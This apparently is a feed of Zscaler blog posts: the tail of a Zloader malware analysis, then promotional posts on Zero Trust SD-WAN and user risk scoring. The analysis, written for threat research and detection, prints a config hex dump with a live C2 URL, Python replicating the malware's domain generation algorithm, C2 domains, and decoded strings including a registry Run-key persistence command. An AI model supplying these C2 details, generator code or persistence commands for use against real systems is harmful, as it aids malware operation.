00 00 00 00 00 00 00 00 4d 31 00 00 00 00 00 |.........M1.....| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 74 || 00000030 74 70 73 3a 2f 2f 61 64 73 6c 73 74 69 63 6b 65 |tps://adslsticke| 00000040 72 68 69 2e 77 6f 72 6c 64 00 00 00 00 00 00 00 || 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000002b0 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 |................| 000002c0 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 |-----BEGIN PUBLI| 000002d0 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 66 4d |C KEY-----.MIGfM| 000002e0 41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 41 |A0GCSqGSIb3DQEBA| 000002f0 51 55 41 41 34 47 4e 41 44 43 42 69 51 4b 42 67 |QUAA4GNADCBiQKBg| 00000300 51 44 4b 47 41 4f 57 56 6b 69 6b 71 45 37 54 79 |QDKGAOWVkikqE7Ty| 00000310 4b 49 4d 74 57 49 38 64 46 73 61 0a 6c 65 54 61 |KIMtWI8dFsa.leTa| 00000320 4a 4e 58 4d 4a 4e 49 50 6e 52 45 2f 66 47 43 7a |JNXMJNIPnRE/fGCz| 00000330 71 72 56 2b 72 74 59 33 2b 65 78 34 4d 43 48 45 |qrV+rtY3+ex4MCHE| 00000340 74 71 32 56 77 70 70 74 68 66 30 52 67 6c 76 38 |tq2Vwppthf0Rglv8| 00000350 4f 69 57 67 4b 6c 65 72 49 4e 35 50 0a 36 4e 45 |OiWgKlerIN5P.6NE| 00000360 79 43 66 49 73 46 59 55 4d 44 66 6c 64 51 54 46 |yCfIsFYUMDfldQTF| 00000370 30 33 56 45 53 38 47 42 49 76 48 71 35 53 6a 6c |03VES8GBIvHq5Sjl| 00000380 49 7a 37 6c 61 77 75 77 66 64 6a 64 45 6b 61 48 |Iz7lawuwfdjdEkaH| 00000390 66 4f 6d 6d 75 39 73 72 72 61 66 74 6b 0a 49 39 |fOmmu9srraftk.I9| 000003a0 67 5a 4f 38 57 52 51 67 59 31 75 4e 64 73 58 77 |gZO8WRQgY1uNdsXw| 000003b0 49 44 41 51 41 42 0a 2d 2d 2d 2d 2d 45 4e 44 20 |IDAQAB.-----END | 000003c0 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a |PUBLIC KEY-----.| 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000003fc Domain generation algorithmWhen the primary C2 server is not available, Zloader reverts to a DGA. The DGA algorithm has changed in the latest version and no longer contains a different seed per botnet. Python code that replicates Zloader’s new DGA algorithm is shown below.import time from datetime import datetime, timedelta def uint32(val): return val & 0xffffffff def get_dga_time(): now = ts = time.time() utc_offset = (datetime.fromtimestamp(ts) - datetime.utcfromtimestamp(ts)).total_seconds() / 3600 midnight = now.replace(hour=0, minute=0, second=0, microsecond=0) midnight = midnight + timedelta(hours=utc_offset) return int(midnight.timestamp()) def generate_zloader_dga_domains(): domains = [] t = get_dga_time() for i in range(32): # number of domains to generate domain = "" for j in range(20): # domain name length v = uint32(ord('a') + (t % 25 )) t = uint32(t + v) t = (t >> 24) & ((t >> 24) ^ 0xFFFFFF00) | uint32(t << 8) domain += chr(v) domains.append(domain+".com") return domains Code sample available on GitHub.The code generates 32 domains per day by using the local system time at midnight (converted to UTC) as a seed. Each of the DGA domains have a length of 20 characters followed by the “.com” TLD.Network communicationsZloader continues to use HTTP POST requests to communicate with its C2 server. However, the network encryption is now using 1,024-bit RSA with RC4 and the Zeus “visual encryption” algorithms. Zloader uses the custom Zeus BinStorage format where the first 128 bytes are the RSA encrypted RC4 key (32 random bytes) and, the remaining bytes are encrypted with the RC4 key and visual encryption as shown in Figure 4:Figure 4. Zloader BinStorage object for a hello message (prior to encryption)The Zeus BinStorage structure uses an ID integer value to represent the information stored, followed by the length and data. The BinStorage ID values in this example are shown in Table 1.Value (Decimal)Value (Hexadecimal)Description100020x2712Botnet ID100250x2729Campaign ID100010x2711Bot ID100030x2713Malware version100060x2716Unknown flag (set to 0x1)Table 1. Zloader BinStorage hello message fieldsThreatLabz has observed samples containing the following botnet IDs:Bing_Mod2Bing_Mod3Bing_Mod4Bing_Mod5All of the campaign IDs have been set to the value M1.Conclusion Zloader was a significant threat for many years and its comeback will likely result in new ransomware attacks. The operational takedown temporarily stopped the activity, but not the threat group behind it. Returning after almost two years, Zloader has brought notable improvements to the loader module such as RSA encryption, an updated DGA, and enhanced obfuscation techniques, with more junk code, API import hashing, and string encryption to thwart malware analysis. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers. Zscaler Coverage In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat names: Win64.Downloader.Zloader Indicators Of Compromise (IOCs) SHA256 Description 038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55 Zloader sample 16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d Zloader sample 25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d Zloader sample 2cdb78330f90b9fb20b8fb1ef9179e2d9edfbbd144d522f541083b08f84cc456 Zloader sample 83deff18d50843ee70ca9bfa8d473521fd6af885a6c925b56f63391aad3ee0f3 Zloader sample 98dccaaa3d1efd240d201446373c6de09c06781c5c71d0f01f86b7192ec42eb2 Zloader sample adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa Zloader sample b206695fb128857012fe280555a32bd389502a1b47c8974f4b405ab19921ac93 Zloader sample b47e4b62b956730815518c691fcd16c48d352fca14c711a8403308de9b7c1378 Zloader sample d92286543a9e04b70525b72885e2983381c6f3c68c5fc64ec1e9695567fb090d Zloader sample eb4b412b4fc58ce2f134cac7ec30bd5694a3093939d129935fe5c65f27ce9499 Zloader sample f03b9dce7b701d874ba95293c9274782fceb85d55b276fd28a67b9e419114fdb Zloader sample f6d8306522f26544cd8f73c649e03cce0268466be27fe6cc45c67cc1a4bdc1b8 Zloader sample fa4b2019d7bf5560b88ae9ab3b3deb96162037c2ed8b9e17ea008b0c97611616 Zloader sample fbd60fffb5d161e051daa3e7d65c0ad5f589687e92e43329c5c4c950f58fbb75 Zloader sample URL Description https://adslstickerhi[.]world Zloader C2 https://adslstickerni[.]world Zloader C2 https://dem.businessdeep[.]com Zloader C2 Appendix Tools The code snippets in this blog have also been uploaded to our GitHub tools repository here. Decoded strings user32.dll nbsp; %s reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v %s /d "%s" wininet.dll td tr br Software\Microsoft\ h3 Local\ hr POST gdiplus.dll NtWriteVirtualMemory https:// * \??\ ntdll.dll ws2_32.dll _alldiv NtProtectVirtualMemory NtGetContextThread shell32.dll %s %s psapi.dll crypt32.dll S-1-15 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ _aulldiv \"%s\" samlib.dll S:(ML;CIOI;NRNWNX;;;LW) NtCreateThreadEx regsvr32.exe /s \"%s\" NtResumeThread bcrypt.dll netapi32.dll RtlGetVersion strtoul winsta.dll wldap32.dll NtReadVirtualMemory Basic 0:0 version.dll h2 InstallDate h5 NtAllocateVirtualMemory .com cabinet.dll S:(ML;;NRNWNX;;;LW) li kernel32.dll %s\tmp_%08x h6 aeiouy div rpcrt4.dll {%08X-%04X-%04X-%08X%08X} iphlpapi.dll mpr.dll C:\Windows\System32\ntdll.dll Connection: close gdi32.dll C:\Windows\System32\msiexec.exe Global\ wtsapi32.dll NtCreateUserProcess shlwapi.dll RtlUserThreadStart %s NtOpenProcess HTTP/1.1 ncrypt.dll INVALID_BOT_ID _aullrem Software\Microsoft\Windows\CurrentVersion\Run dnsapi.dll ole32.dll .dll C:\Windows\SysWOW64\msiexec.exe bcdfghklmnpqrstvwxz ftllib.dll User metrics ThreadStart MSIMG32.dll \* JKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq h1 NtSetContextThread */* GET userenv.dll urlmon.dll Software\Microsoft\Windows NT\CurrentVersion _ThreadStart@4 dxgi.dll NtOpenSection script /post.php advapi32.dll h4 secur32.dll imagehlp.dll %s_%s_%X winscard.dll References 1 The Curious Case of an Unknown Trojan Targeting German-Speaking Users 2 Dismantling ZLoader: How malicious ads led to disabled security tools and ransomware | Microsoft Security Blog Fri, 19 Jan 2024 15:41:37 -0800 Santiago Vicente Introducing Zero Trust SASE The evolution of work and IT Workplaces are rapidly evolving and hybrid work has become the new normal. Legacy network architectures were designed around a static model of work where users were in fixed locations. Today’s branches look very different — with hoteling desks, co-working spaces, a mobile workforce, and internet-centric connectivity. As branches evolve, so too must the networking infrastructure used to connect them — one size no longer fits all. Legacy networks introduce risk & complexity The traditional model of connectivity is very network-centric — users, devices and servers connect to a network, and the network assures access to every other device on the same network. This model has too much implicit trust — any device can talk to any other device or server by default, enabling the lateral movement of threats and attacks such as ransomware. Network-centric connectivity also requires extending the network into public clouds and third parties using VPN tunnels, which can expand your attack surface into infrastructure that you do not directly control. Along with the proliferation of IoT devices in organizations, attack surface management becomes increasingly complex. Relying on routed overlays and traditional routing protocols also introduces additional complexity into networks. Traditional SD-WAN is not zero trust SD-WANs also take a network-centric approach and build routed overlays using site-to-site VPN tunnels and routing protocols. While they allow organizations to move away from expensive MPLS networks and solve many operational challenges, they introduce security risks by facilitating lateral movement. Controlling these risks requires network-based segmentation, which often necessitates additional firewall appliances at the branch and complex network-based security policies. Zero trust is a cybersecurity strategy that assumes every entity is untrusted by default — and only allows access to certain resources based on identity, context, and posture. This is fundamentally opposed to the way traditional networks work. We could limit the trust inherent in traditional networks through techniques like segmentation and admission control, but these approaches can dramatically increase complexity. It’s time for a new approach — built on zero trust principles. Introducing Zero Trust SD-WAN I previously announced our Branch Connector appliances for connecting branches through the Zero Trust Exchange. Today I am excited to announce Zero Trust SD-WAN — an industry-first zero trust solution for securely connecting branches, factories, hospitals, retail locations, and data centers — that eliminates the security risks of traditional SD-WANs. Using lightweight virtual machines or plug & play appliances coupled with the Zscaler Zero Trust Exchange, Zero Trust SD-WAN provides secure inbound and outbound zero trust networking for locations, without overlay routing, additional firewall appliances or policy inconsistencies. Fully integrated with our industry-leading SSE platform, Zero Trust SD-WAN enables robust security and simplifies branch network management. We are also pleased to announce general availability of our Z-Connector plug & play appliances — ZT 400, ZT 600 and ZT 800. Along with a lightweight virtual machine form factor, these appliances can support a wide range of customer requirements, ranging from 200 Mbps to multi-gigabit. With pre-provisioned config templates and zero touch provisioning, deploying a new branch can be as simple as plugging in an internet connection. New gateway capabilities The Zero Trust SD-WAN solution can be deployed in two modes: as a Forwarder, or as a Gateway. The Forwarder mode enables customers with existing WAN solutions to implement a zero trust overlay by deploying Z-connector appliances next to their existing routers and switches. Relevant traffic can be directed to the Z-connector appliances through conditional DNS resolution or policy-based routing. The Gateway mode terminates the ISP connection directly on the Z-Connector appliance, eliminating the need for additional routers or firewalls. The Z-connector acts as the default gateway for the site, forwarding all traffic to the Zscaler Zero Trust Exchange which provides secure connectivity to internet, SaaS, and private applications. Gateway mode supports rich WAN and LAN management capabilities, including dual ISP termination, app-aware path selection with ISP monitoring, high availability (active-active, active-passive), multiple LAN subnets, local firewall, integrated DHCP server, and DNS gateway. Zero Trust SD-WAN gateway capabilities will be available starting February 2024. Zero Trust SD-WAN reduces complexity and risk Zero Trust SD-WAN solves many critical challenges for our customers. Here are a few key use cases: Replace site-to-site VPNs: Avoid complex VPN configurations and route table management and eliminate the risk of lateral threat movement. Accelerate M&A integrations: Connect users to apps across organizations without merging routing domains or deploying NAT gateways. Reduce integration time from months to days. Secure OT connectivity: Eliminate VPNs and exposed ports for vendor remote access to OT resources. IoT discovery & classification: Discover and secure IoT devices on the network with AI-powered classification engines To learn more about these use cases, read our blog on bringing zero trust to branches. Industry-first SASE platform built on zero trust Secure Access Service Edge (SASE) is a term coined by Gartner to describe the convergence of networking and security to align with modern IT infrastructure and working patterns. While SASE embraces zero trust principles, many SASE solutions in the market simply bolt on traditional SD-WAN to an SSE service, with zero trust principles limited to user-to-app access. This still leaves sites exposed with too much implicit trust. With the introduction of Zero Trust SD-WAN, Zscaler is proud to deliver the industry’s first single vendor SASE platform built on zero trust and AI. Zero Trust SASE enables organizations to extend zero trust beyond just users, to branches, factories and data centers. Building on the strengths of our SSE platform — the Zero Trust Exchange — Zero Trust SASE reduces cost and complexity by eliminating traditional security and networking solutions. Transform your branch networks Legacy WAN architectures no longer work. The industry-wise disruptions around hybrid work and zero trust security present a unique opportunity to rethink and transform your network architecture. Zero Trust SD-WAN and SASE take a radically different approach to connecting users, devices, and apps without the risk of lateral threat movement. Visit our SASE resources page for additional product information, white papers and videos and read more about our Zero Trust SD-WAN capabilities here. Mon, 22 Jan 2024 17:50:01 -0800 Naresh Kumar How Zscaler’s Dynamic User Risk Scoring Works Access control policies aim to balance security and end user productivity, yet often fall short due to their static nature and limited ability to adapt to evolving threats. But what if there was an easy way to automate access control per user, considering individual risk factors and staying up-to-date with the latest advanced attacks? Zscaler User Risk Scoring takes dynamic access control and risk visibility to the next level using records of previous behavior to determine future risk. Similar to how insurance companies use driving records to determine car insurance rates, or banks use credit scores to assess loan eligibility, user risk scoring leverages previous behavior records to assign risk scores to individual users. This allows organizations to set dynamic access control policies based on various risk factors, accounting for the latest threat intelligence. User risk scoring empowers organizations to restrict access to sensitive applications for users with a high risk score until their risk profile improves. By considering factors such as past victimization by cyberattacks, near-misses with malicious content, or engagement in behavior that could lead to a breach, organizations can ensure that access control policies are tailored to individual risk profiles. Organizations can set user risk thresholds to allow or deny access to both private and public application How does user risk scoring work? User risk scoring plays a crucial role across the Zscaler platform, driving policies for URL filtering, firewall rules, data loss prevention (DLP), browser isolation, and Zscaler Private Access (ZPA); and feeding into overall risk visibility in Zscaler Risk360. By leveraging user risk scores within each of these security controls, organizations can better protect all incoming and outgoing traffic from potential threats. URL filtering rules are one way that risk scoring can be applied to policies within Zscaler Internet Access (ZIA) The risk scoring process consists of two components: the static (baseline) risk score and the real-time risk score. The static risk score is established based on a one-week lookback at risky behavior and is updated every 24 hours. The real-time risk score modifies this baseline every 2 minutes throughout the day, updating whenever a user interacts with known or suspected malicious content. Each day at midnight, the real-time risk score is reset. Zscaler considers more than 65 indicators that influence the overall risk score. These indicators fall into three major categories: pre-infection behavior, post-infection behavior, and more general suspicious behavior. The model accounts for the fact that not all incidents are equal; each indicator has a variable contribution to the risk score based on the severity and frequency of the associated threat. Pre-infection behavior indicators encompass a range of blocked actions that would have led to user infection, such as blocked malware, known and suspected malicious URLs, phishing sites, pages with browser exploits, and more. Post-infection behavior indicators include things like detected botnet traffic or command-and-control traffic, which show that a user/device has already been compromised. Suspicious behavior indicators are similar to pre-infection indicators but are less severe (and less guaranteed to lead to infection), covering policy violations and risky activities like browsing deny-listed URLs, DLP compliance violations, anonymizing sites, and more. *A more detailed sampling of these indicators is included at the bottom of this article. How can Zscaler customers use risk scoring? User risk scores can be found in the the analytics and policy administration menus of both Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). They are also woven together with a range of additional inputs in Zscaler Risk360, which allows security teams to delve deeper into their organization’s holistic risk. Organizations can monitor risk scores for individuals and for the overall organization Zscaler also has deep integrations with many leading security operations tools, allowing the same telemetry and incident alert context that feeds into risk scoring to be shared with tools like SIEM, SOAR, and XDR via a REST API to streamline workflows. These scores can be used to: Drive access control policies User risk scoring gives network and security teams a powerful tool to use to drive low-maintenance zero trust access control policies, controlling both incoming and outgoing internet and application traffic. It can be combined with other dynamic rulesets (e.g., device posture profiles) and static rulesets (e.g., URL and DNS filtering and app control policy) to protect organizations from breaches without unnecessarily restricting user productivity. User risk, device posture, and other access policies work together seamlessly to optimize secure access Monitor overall organizational risk and key factors that can be improved Admins can monitor their company risk over time to assess the top areas of overall company risk and prioritize remediation efforts. They can see how risk scores are distributed across users and locations, and can benchmark their risk score against other companies in their industry. Company risk scores can be analyzed over time against industry benchmarks Monitor risky users on an individual basis and understand how (and why) their risk is trending If a user’s risk score spikes, admins can take action, whether that be isolating that user’s machine to deal with an active threat, or simply training a user that certain behaviors are posing an unacceptable risk. Admins can analyze individual users and double-click into specific incidents Overall, Zscaler User Risk Scoring, with its categorization of threats and aggregation of logs, offers valuable insights into an organization's security posture. By understanding the different types of risks and behaviors associated with cyberthreats, organizations can implement dynamic access control policies and proactively protect their critical assets and data. With risk scoring, organizations can navigate the ever-changing threat landscape with confidence. To learn about more of Zscaler’s unique inline security capabilities, check out our Cyberthreat Protection page. Sample Indicators for User Risk Scoring · Pre-infection behavior includes a range of blocked actions that would have likely led a user to be infected, such as: o Malware blocked by Zscaler’s Advanced Threat Protection or inline Sandbox o Blocked known and suspected malicious URLs o Blocked websites with known and suspected phishing content o Blocked pages with known browser exploits o Blocked known and suspected adware and spyware o Blocked pages with a high PageRisk score o Quarantined pages o Blocked files with known vulnerabilities o Blocked emails containing viruses o Detected mobile app vulnerabilities · Post-infection behavior includes a range of blocked actions that were attempted after a user was infected, such as: o Botnet traffic o Command-and-control traffic · Suspicious behavior includes policy violations and other risky sites, files, and conditions that could lead to infection, such as: o Deny-listed URLs o DLP compliance violations o Pages with known dangerous ActiveX controls o Pages vulnerable to cross-site scripting attacks o Possible browser cookie theft o Internet Relay Chat (IRC) tunneling use o Anonymizing sites o Blocks or warnings from secure browsing about an outdated/disallowed component o Peer-to-peer (P2P) site denials o Webspam sites o Attempts to browse blocked URL categories o Mobile app issues included denial of the mobile app, insecure user credentials, location information leaks, personally identifiable information (PII), information identifying the device, or communication with unknown servers o Tunnel blocks o Fake proxy authentication o SMTP (email) issues including rejected password-encrypted attachments, unscannable attachments, detected or suspected spam, rejected recipients, DLP blocks or quarantines, or blocked attachments o IPS blocks of cryptomining & blockchain traffic o Reputation-based blocks of suspected adware/spyware sites o Disallowed use of a DNS-over-HTTPS sit Fri, 19 Jan 2024 05:00:01 -0800 Mark Brozek